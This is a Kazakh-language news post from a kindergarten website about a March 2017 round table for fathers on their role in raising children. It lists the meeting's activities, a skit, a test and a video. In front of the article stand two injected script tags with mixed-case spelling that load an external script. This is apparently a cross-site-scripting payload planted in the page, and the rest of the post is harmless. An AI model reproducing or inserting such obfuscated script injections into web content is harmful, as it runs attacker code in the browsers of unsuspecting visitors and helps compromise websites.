<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

14.03.2017

2017 жылы №7 « Айша» балабақшасында наурыздың он төрті күні «Отбасындағы әкенің рөлі» аты  дөңгелек үстел өтті.

Мақсаты: Бала тәрбиесінде  әкенің рөлі ерекше екендігін ұғыну және балабақша мен отбасының өзара  байланысын, қарым-қатынасын  нығайту мақсатында өткізілді. Дөңгеле үстелімізді балабақша меңгерушісі Нупилова Бану  Нәбиқызы сәлемдесу сөзімен ашып берді. Қатысушылар: Әкелер, балабақша әкімшілігі, қонақтар «Шаңырақ» әлеуметтік-психологиялық және зерттеу орталығы қоғамдық  қорының басшысы Ракушев Берік  Ұзақпайұлы болды.  Дөңгелек үстел келесі  жоспар бойынша өтті:1. Әкелермен танысу ойын - жаттығуы « Мен үшін әке болу бұл бақыт,жетістік, байлық,арман, дәреже, мәртебе,өмір, жауапкершілік.... )»

2.  №7 « Аладдин» ортанғы  тобының  бүлдіршіндерінің қатысуымен «Қараусыз қалған бала» атты шағын көрініс   

3. «Сіз жақсы әкесіз бе ?» тесті  әкелерімізбен өткізілді. Әкелерге арналған кеңес жаднамасы  таратылды.

4. « Әке, мен сенің 1 сағат уақытынды сатып алайыншы» бейнеролик тамашалынып, келген қонақтарымыз ойларымен бөлісті.

Просмотров: 448


Пікір қосу



Деректерді қолтаңбаға қосу